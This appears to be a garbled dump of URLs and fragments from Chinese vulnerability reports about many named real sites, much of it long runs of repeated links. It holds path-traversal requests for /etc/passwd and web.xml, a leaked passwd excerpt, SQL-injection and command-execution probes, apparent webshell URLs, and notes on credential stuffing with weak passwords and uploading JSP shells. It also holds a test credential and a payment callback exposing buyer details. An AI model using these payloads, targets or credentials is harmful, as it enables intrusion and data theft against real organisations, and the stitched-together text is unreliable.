http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:8888/dm_listg.action存在命令执行漏洞 http://**.**.**.**/bugs/wooyun-2015-0136114 http://**.**.**.**/manager/login.cfm地址, http://**.**.**.**/ http://**.**.**.**/newtvuser_eng/index1.cfm http://**.**.**.**/newtvuser/index1.cfm http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**//index.phpcate_id=13&m=Article&temp=../../../../../../../../../../etc/passwd 
https://sl.zte.com.cn/ssologin.action存在心脏滴血漏洞 http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen jdbc:oracle:thin:@**.**.**.**:1521:orcl http://fix.zealer.com/home/record?id=2570&type=re http://218.2.113.254/ http://fapp.cnhubei.com/wall_wsjb/index.php?wtype=1 http://www.goshare2.com/reset-password http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=56853 http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=??? http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=142002 http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=142006 http://**.**.**.**/icarttw/getSpxx.action?flid=1725&page=1&type=4 http://**.**.**.**/icarttw/getInfo.action?splx=1&spxxid=755026091&type=1 http://**.**.**.**/icarttw/listwsjg.action?zz=&cbsmc=&flags=&flag=10&flagc=&fxflid=0205060000&page=1 http://**.**.**.**/下面列出了一堆演示网站及账号密码 http://**.**.**.**/bugs/wooyun-2010-0139696 http://bjeos.tj.**.**.**.** http://**.**.**.**): http://**.**.**.**/manage/login.asp http://**.**.**.**/admin/admin.php http://yoollo.tj.**.**.**.**/manage.html http://ihomef.tj.**.**.**.**/manager.html?action=login jdbc:oracle:thin:@**.**.**.**:1521:yzfpt http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional http://gkcf.dzwww.com:80/ http://**.**.**.**/news/show.asp?id=2605 http://**.**.**.**/news/show.asp?id=2605 http://a.chemao.com.cn/admin/index.php http://a.chemao.com.cn/admin/index.php?app=user http://a.chemao.com.cn/admin/index.php?app=admin&page=11 http://a.chemao.com.cn/admin/index.php?app=car&act=index&status=3&page=2 http://erp.dongdalou.com/index.php http://**.**.**.**/TuniS/**.**.**.**/press/main.php?id=1208 http://**.**.**.**/TuniS/**.**.**.**/press/main.php?id=1208 http://**.**.**.**/TuniS/**.**.**.**/press/main.php?id=1208 
http://www.cetools.cn/index.php/cetools/login http://**.**.**.**/upload_files/ http://**.**.**.**/upload_files/file/ http://**.**.**.**/admin/index.php?msg=1001 http://118.122.88.90:60465/ http://**.**.**.**/include/css_out.php?css=main http://**.**.**.**/swj/kjfw/news/kyyydw/dwFrame.jsp?type=/WEB-INF/web.xml http://www.0755tt.com/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://project.himin.net:8080/web/index.php net:8080 http://**.**.**.**:8080/seeyon/index.jsp http://**.**.**.**/tc_chi/whatsnew/consultation.php?id=318 http://**.**.**.**/tc_chi/whatsnew/briefing.php?id=316 http://qcrc.**.**.**.**/phpinfo.php http://www.haoyicn.cn/admin/ Injection:http://**.**.**.**/jw_home/news_info.jsp?item_id=0202&article_id=140612946041 http://service.hundsun.com:8180/secure/Dashboard.jspa,可以注册新用户。 http://114.215.173.137:8190/,可以用上面的账号和密码登录。仍旧是一些无用的信息。 http://**.**.**.**/wwwroot.rar http://www.iqegg.com/.git/config http://www.iqegg.com/flow.php http://**.**.**.**/bugs/wooyun-2015-0136013 https://member.zhaogang.com/member/Password.aspx http://**.**.**.**/gbsnews.asp?id=168502 http://**.**.**.**/gbsnews.asp?id=168502 http://act.midea.com/kt30year/site/action.php?act=like&class= http://123.57.231.146:808 http://**.**.**.**/,但看了下没什么大的漏洞,就果断切换C段,然后找到这个服务器:**.**.**.**:8003/ http://mobile.chinaiiss.com/strategy/v3/user/set_userinfo https://github.com/Alex2006/ShortMessage/blob/9bcfd587a798f52e1d7c1d69194f3c0c0e3718c9/ShortMessage/MailManager.cs http://www.dfpv.com.cn/fs/pressroom_reg.html http://**.**.**.**/ https://**.**.**.**/admin/login.jsp https://**.**.**.**/admin/doCheckLogi https://**.**.**.**/admin/login.jsp http://zhaopin.gwm.cn:3680/job/ http://zhaopin.gwm.cn:3580/ http://**.**.**.**/ http://www.cwan.com/ www.imbagame.com http://www.cwan.com/ http://weixin.wxcrg.com.cn/xapp/ 
http://cms.jushanghui.com:80/processLogin.shtml?&redirect:xxx${13579246-1 http://www.pangmao56.com/AppMeet.aspx url:http://www.sinodtc.com/admin/index.aspx http://www.sinodtc.com/Company_news.aspx?id=2 http://221.195.68.213/login.aspx http://221.195.68.213/OA/RecieveDocument/RecDocSearch.aspx http://101.227.9.191:81 http://101.227.9.190:81 http://101.227.9.188:81 http://101.227.9.189:81 http://101.227.9.188:81/products.php?act=eidt&id=1 http://**.**.**.**:8000 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0136281 http://bj.feiren.com/)的时候,发现页面下方有个APP下载,于是检测了一下。 http://m.cococ.cc/xfirews/faq http://122.224.251.229/ http://**.**.**.**/CMS/cms.rar http://**.**.**.**/MemMan/main.aspx http://**.**.**.** http://**.**.**.**/UserServlet?i=1&action=login http://**.**.**.**/UserServlet?i=1&action=login URL:http://mail.yto.net.cn/#1 http://wvw.9377.com/register.php http://**.**.**.**/bugs/wooyun-2010-0146042有个邮箱账户包含一个vpn账户 http://**.**.**.**/bugs/wooyun-2010-0146042里邮箱账户登录,如下: http://**.**.**.**/video_content.php?id=8 http://**.**.**.**/jnjj/ http://wooyun.org/bugs/wooyun-2010-0101271 http://api.passport.pptv.com/dologin.do http://sinopecvm.lyodssoft.com/Sinopec/index.htm http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/hello.txt http://**.**.**.**/hello.asp;.txt http://**.**.**.**/ http://**.**.**.**/products/index.php?users_id=1248 http://**.**.**.**/products/index.php?users_id=1248 http://**.**.**.**:8000 http://**.**.**.**:8000/question/attach.upload http://**.**.**.**/PortInfo/,新系统http://**.**.**.**/dataportal http://**.**.**.**/dataportal/query.do?qn=dp_select_message&id=402803cf4d41f869014e2f3aa87e0064 http://www.hs-post.com/,官网介绍如下: www.hs-post.com http://www.hs-post.com http://www.hs-post.com/igenus/login.php?Cmd=error&Code=-1 www.bendibao.com www.bendibao.com::webshequ/test/ http://shequ.sz.bendibao.com/test/1.php http://122.224.251.229/ http://122.224.251.229/question/attach.upload http://**.**.**.**/disact.php?fid=70&id=643 
http://**.**.**.**/disact.php?fid=70&id=642 http://**.**.**.**/admin http://s.haier.com/haierproject/saas/aaa.php?q=3458115 http://113.106.61.40:8089/zindex.jsp http://113.106.61.40:8089/myname/cmd.jsp http://authors.cnhubei.com/Reg.html http://authors.cnhubei.com/Model/AUTHORS/CheckUserManage.aspx?PageMenuID=11001 http://authors.cnhubei.com/index.aspx http://bus.satrip.com/Login.aspx http://bus.satrip.com http://**.**.**.**/index.php?ac=article&at=list&tid=151 http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**/bugs/wooyun-2010-0108559,发现上传数据包中一个关键参数uploadnexturl,试探下得到漏洞POC http://**.**.**.**/question/attach.upload http://**.**.**.** http://www.chinaiiss.com/adclick.php?id=3782 http://www.vcanbio.com/investor_articledetail.aspx?id=1'%22 http://bbs.2345.cn/ https://**.**.**.** http://**.**.**.**/produce/cpxx_rlzy.htm http://**.**.**/rlweb/_data/rule.aspxid=1_ http://**.**.**/rlweb/_data/rule.aspxid=1_ http://**.**.**/_data/rule.aspxid=1_ http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 http://**.**.**.**:8888/HyperLink/warehouse_msg_01.aspx?type=A&no= http://**.**.**.**:10088/HyperLink/warehouse_msg_01.aspx?type=A&no= https://**.**.**.**/question/tag?tagid=12 http://**.**.**.**/ http://**.**.**.**/ http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619365 http://ebooking.lvmama.com/vst_ebooking/ebooking/advice/findEbkAdviceContentList.do?subjectId=2 http://**.**.**.**/weboa/webpage.nsf,如图所示: http://in.satrip.com/Login.asp http://user.goodbaby.com主站登录接口无验证码无限制用户名和密码都是明文传输的 http://**.**.**.**/manager/login.cfm http://**.**.**.**/manager/login.cfm http://**.**.**.**/index/index.jsp,中国烟草安徽中烟协同办公平台,可用常用用户名和弱口令进行撞库,获得三个有效账号,登陆后可查看内部敏感信息,在“发文拟稿”的“上传附件”处可以上传jsp大马获取shell(服务器应该有杀毒软件,一般的一句话木马无法成功连接)。 site:gitlab.365ime.com http://im.suning.com/ 
http://**.**.**.**/henan/tags.aspx?tag=%D6%A3%D6%DD http://**.**.**.**/ http://qingdao.liebiao.com/xiaoqu/?q= http://sqlmap.org http://**.**.**.**/defaultroot/login.jsp,中国烟草山西昆明烟草有限责任公司协同办公系统,登陆处可用常用用户名及弱口令123456获得一个有效账号。登陆后可查看公文、邮件、档案文件、公司通讯录等等敏感信息,在右上角“在线人数”处,疑似存在sql注入,但好像对输入字符长度进行了限制; http://**.**.**.**/console/login/LoginForm.jsp,存在weblogic弱口令12345678,登陆后可部署war包,发现前人留马痕迹。 http://210.21.81.169/ http://210.21.81.169/Login.aspx http://sqlmap.org http://**.**.**.**/web/vote_response.asp android:allowBackup参数值为"true",这样配置无需ROOT可通过adb备份应用数据 http://km.chinadrtv.com/homepage/LoginHomepage.jsp?hpid=21 http://mall.jzq001.com/plugin.php?id=mall&type=shop_cont&itemid=1619 http://**.**.**.**/sungov/viewReportingServices.do?bod001=W9000058567 http://218.57.11.80:80/zxzqsd/cn/job/shownotice.aspx?newsid=1经过sqlmap判断为dba http://**.**.**/index.aspnodeid=4167&newsid=23897&ly=content_ http://**.**.**/dzb/index.aspid=15&ly=content&nodeid=57&newsid=251_ http://**.**.**/index.aspnewsid=5297&nodeid=1451&ly=content_ http://**.**.**/dzb/index.aspnodeid=32&newsid=56&ly=content_ http://**.**.**/index.aspnewsid=5006&nodeid=1185&ly=content_ http://**.**.**/index.aspnodeid=1522&newsid=6473&ly=content_ http://**.**.**/index.aspnodeid=1575&newsid=7622&ly=content_ http://**.**.**/index.aspnodeid=1396&newsid=5029&ly=content_ http://**.**.**/index.aspnodeid=3220&newsid=10187&ly=content_ http://**.**.**/new/jxkjsf/index.aspnodeid=1613&newsid=7301&ly=content_ http://**.**.**/index.aspnodeid=1134&newsid=4300&ly=content_ http://**.**.**/paper/index.aspid=269&nodeid=1093&newsid=3998&ly=content_ http://**.**.**/index.aspnodeid=1729&newsid=56290&ly=content_ http://**.**.**/xgxb/index.aspnodeid=4494&newsid=18170&ly=content_ http://**.**.**/index.aspnodeid=4092&newsid=26362&ly=content_ http://**.**.**/index.aspnodeid=1245&newsid=5743&ly=content_ http://**.**.**/index.aspnodeid=3200&newsid=10127&ly=content_ http://**.**.**/index.aspnodeid=1167&newsid=4521&ly=content_ 
http://**.**.**/index.aspnodeid=1838&newsid=8221&ly=content_ http://**.**.**/index.aspnodeid=1499&newsid=7455&ly=content_ http://**.**.**/index.aspnodeid=1323&newsid=5294&ly=content http://rxhzw.76ju.com/?action=detail&id=4680 http://xyfm.76ju.com/?action=detail&id=4422 http://wssb.76ju.com/?action=detail&id=2966 http://**.**.**.**/201314_hist4312ps.html?id=1705 http://**.**.**.**/cuscs/search/srch_by_index.php?lang=tc&acad_code=gc&is_abp=0 Injection:http://**.**.**.**/edb/index.php/en/home?option=com_courses&task=prog_info&progId=3CC0CFC7-4EBF-4AC5-AD81-6B544447BA34 http://**.**.**.**//page/maint/login/Page.jsp?templateId=18 http://s.bdmob.cn/huodong/shuju.asp?hid=226&bid=514 https://member.zhaogang.com/member/Password.aspx http://dsp.gome.com.cn/ http://**.**.**.**/yjsjwgl/qt/cktz.do?tzxh=772 http://**.**.**.**/artlist.do?id=2 http://**.**.**.**/artlist.do?ID=15 http://**.**.**.**/artlist.do?ID=15 http://**.**.**.**//artlist.do?ID=15 http://ty.top.99.com/userlevel.aspx?pro=20 http://m.ahic.com.cn/wxpt/claimsSeachAction.do http://www.51766.com/www2009/dujia/search.jsp?startAdd_name=%E9%98%B3%E6%B1%9F%E7%9F%B3%E8%A7%89%E5%AF%BA&linetype=5&ent_id=bjql&minPrice=10000&pageNo=1 http://58.251.6.92/web_login/login.aspx http://**.**.**.**/report/login.asp http://119.0.139.54:8080/index.action http://**.**.**.**/gl/pl5/ http://222.241.161.196:8088/login.action http://222.241.161.196:8088/login.action http://**.**.**.**/help/downfile.jsp?fileName=denglubiao http://**.**.**.**//common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../../../../ http://**.**.**.**/cscecGuidang/searchGuidangList.action?search=true http://**.**.**.**/cscecGuidang/searchGuidangList.action?search=true http://www.qu.cn/app/android/100/user_order.php?act=detail&id=1301432 http://www.qu.cn/app/android/100/user_order.php?act=detail&id=1101432 http://www.qu.cn/app/android/100/user_order.php?act=detail&id=111432 
www.zhujiwu.com/usercenter/service/gd_add.asp/1.php www.zhujiwu.com/usercenter/cmd/gd_cmd.asp/1.php www.zhujiwu.com/inc/show_img.asp?file_path=d:/wwwroot/upload/../global/Function.asp http://dz.loupan.com/index.php?apartments=0&area=1&c=house&decorate=0&existing=0&feature=0&keywords=&m=get_house_combox_list&page=1&price=0&property=0&state=0&subway=0 http://admin.1jiajie.com/v2/index.php?action=login&do=auth http://www.bj-gem.com.cn/ http://pmcm.bj-gem.com.cn/upload/downloadfile.aspx?DocGUID=65d4f4f1-4851-44d0-9cf4-495fe84afcd2* http://zhiyuan.edu.sina.com.cn/index.php?a=../../../../../../../../../../etc/passwd%00&p=zhiyuan2015&s=solution inurl:newsMsg.php?newsno= http://**.**.**.**/newsMsg.php?newsno=2 http://**.**.**.**/newsMsg.php?newsno=276 http://**.**.**.**/newsMsg.php?newsno=393 http://**.**.**.**/newsMsg.php?newsno=194 http://**.**.**.**/newsMsg.php?newsno=328 http://mceair.962008.com/ROUTE/Default.aspx?keyword=%u666E%u5409%u5C9B&KeyChannelType= mceair.962008.com/Control/Destination.aspx http://app.qu.cn/ http://scm.beequick.cn/ware/ test:123456 http://**.**.**.**:8383 http://**.**.**.**:8383/ewebeditor/admin/default.jsp http://223.94.80.136:8085/ http://www.pinjiu.com/ http://www.pinjiu.com/user.php?act=get_password https://121.15.129.252/ http://**.**.**.**/channels/4.html POST:user_name= http://**.**.**.**:5080/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://qhmu.cf/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/viewgood/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**:8082/viewgood/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/viewgood/Pc/Content/Request.aspx?action=name_check 
http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**:8000/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check POST:UserGUID=1 http://**.**.**.**:5080/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://qhmu.cf/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/viewgood/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**:8082/viewgood/ADI/portal/UserDataSync.aspx http://**.**.**.**/viewgood/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**:8000/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/channels/4.html http://**.**.**.**:5080/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://qhmu.cf/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/viewgood/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**:8082/viewgood/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/viewgood/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 
http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**:8000/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://bbs.gome.com.cn/ http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 
http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://www.**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 
http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://www.**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://221.8.57.110/i-card/k8cmd.jsp http://221.8.57.110/i-card/one8.jsp http://221.8.57.110/i-card/one.jsp http://221.8.57.110/i-card/help.jsp http://**.**.**.**/coremail/index.jsp?cus=1 http://www.3hk.cn/index.php?action=alipay&ctr=simplepay http://**.**.**.**:80/frontpage/company.jsp?gqhxId=880018*&menuPath=GQHQ http://www.c3crm.com http://www.c3crm.com/bbs http://www.c3crm.com/bbs/bbs.zip http://**.**.**.**/Corder.asp?act=11&msg=%E8%B3%87%E6%96%99%E4%B8%8D%E6%AD%A3%E7%A2%BA 
http://**.**.**.**:20022/iss_amwebins/ec/alltrustcard/cardRegister.jsp http://**.**.**.**:20022/iss_amwebins/servlet/FileLookServlet?upfileurl=/etc/passwd http://votegd.gridinn.com/phpmyadmin http://cytsadm.hszw.com/ http://oa2.xiaoniu66.com:5081/login.jsp http://oa1.xiaoniu66.com:7890/easoa/themes/mskin/login/login.jsp http://qcdds.dongfeng-nissan.com/ http://118.244.195.24/ http://**.**.**.**:81/defaultroot/login.jsp,是安徽省农村信用社联合社网站(http://**.**.**.**/)的后台管理系统,验证码设计存在缺陷,抓包发现只要“thisRand”和“srand”参数一致就可以实施撞库,用人名拼音和弱口令111111可获取8个有效账号,某个账号duyf登陆后发现是个超级管理员,权限很大,能对内容管理、扩展功能、互动功能、发布管理、模板库管理、站点配置等等进行操作,能分配其它管理员权限。 http://**.**.**.**:7011/iss_dbwebins/ec/alltrustcard/cardRegister.jsp http://**.**.**.**/bugs/wooyun-2010-0123155 http://**.**.**.**:7011/is/index.jsp http://**.**.**.**:7011/ceshi/a.jsp?sort=4&file=%2Fdata%2Fwls10_mp1%2Fuser_projects%2Fdomains%2Fiss_domain%2Fservers%2F3%2Fupload%2FISS_DBWEBINS_20140917%2FWEB-INF%2Fweb.xml http://group.gome.com.cn/ http://manage.group.gome.com.cn/ http://119.254.70.190/phpinfo.php http://rmp.haier.net/phpmyadmin/,发现服务器运行phpmyadmin,为xampp集成,其中mysql code.csdn.net/openyp/search_open_figure?key=1&utf8=%e2%9c%93 http://**.**.**.**/ www.cema.org.cn)是目前国内挖掘机行业最大、最专业的互联网企业。自其创立以来始终秉承“以资讯创造价值”的理 http://vip.zhaogang.com/,登陆处存在撞库,可获得一些有积分的账号,10积分=1元,威胁用户积分安全。 http://**.**.**.**/ https://github.com/yinzhijian/z2c/blob/0e9e598efca7fcc6dc98c41f5cc6db7609093701/classes/WeixinOrder.php http://**.**.**.**/web2/login_template/11.html http://tc.changhong.com/metrology/jl.aspx?type=chemistry https://mail.ceair.com https://sslvpn.ceair.com http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**:80/ file://,也可以iframe file://可执行文件时候会直接执行 http://**.**.**.**:80/ https://**.**.**.**/iFaxUserInterface/lostPasswd.action http://**.**.**.**/user/getUserBySid/?username=xxxxx获取到自己账户的id,然后通过如下页面使用id遍历用户名 
http://my.tesla.cn/alipayreturnfp?body=Model+S&buyer_email=zhaoyue%40aijoy.net&buyer_id=2088311949415681&exterface=create_direct_pay_by_user&extra_common_param=6dchu9miajons9spqjufjie643&is_success=T¬ify_id=RqPnCoPT3K9%252Fvwbh3InVam4xme%252B9DwHRJxOFelUF1eRvMkXXYfg5oUb6Qw300wMz7swL¬ify_time=2015-10-07+23%3A52%3A00¬ify_type=trade_status_sync&out_trade_no=[支付RN号]&payment_type=1&seller_email=chinafinancesz%40teslamotors.com&seller_id=2088611024475284&subject=Tesla&total_fee=132000.00&trade_no=2015100721001004280023329978&trade_status=TRADE_SUCCESS&sign=8a920df1e7fd9b104e2c61903380c775&sign_type=MD5 https://exmail.qq.com/cgi-bin/geturlinfo?sid=【你的sid】&url=http%3A%2F%2F10.130.186.11/&pageid=compose http://wwwtest.fuiou.com:8992/fuMer/login.action https://mail.fuiou.com http://pass.tom.com/login.php http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0144565 http://**.**.**.**/demo/tologin.action http://**.**.**.**/bugs/wooyun-2015-0144565 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8088/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.huaweihcc.com http://www.huaweihcc.com/iframe.jsp?bar=mediaPicture&id=3&categoryId=PIC_SCENE http://www.ncmg2010.sdu.edu.cn/admin/ ygc:x:510:510:医管处:/home/ygc/./wwwroot:/sbin/nologin ipo:x:511:511::/home/ipo2/./wwwroot:/sbin/nologin bioinfo:x:512:512::/home/bioinfo/./wwwroot:/sbin/nologin zzzx:x:513:513::/home/zzzx1/./wwwroot:/sbin/nologin cie:x:514:514::/home/cie/./wwwroot:/sbin/nologin cmhi:x:515:515::/home/cmhi/./wwwroot:/sbin/nologin wljy:x:516:516::/home/wljy/./wwwroot:/sbin/nologin sp:x:517:517::/home/sp/./wwwroot:/bin/nologin blsl:x:518:519::/home/blsl/./wwwroot:/sbin/nologin cmse:x:519:520::/home/cmse/./wwwroot:/sbin/nologin fls:x:520:521::/home/fls/./wwwroot:/sbin/nologin infosec:x:521:522::/home/infosec/./wwwroot:/sbin/nologin 
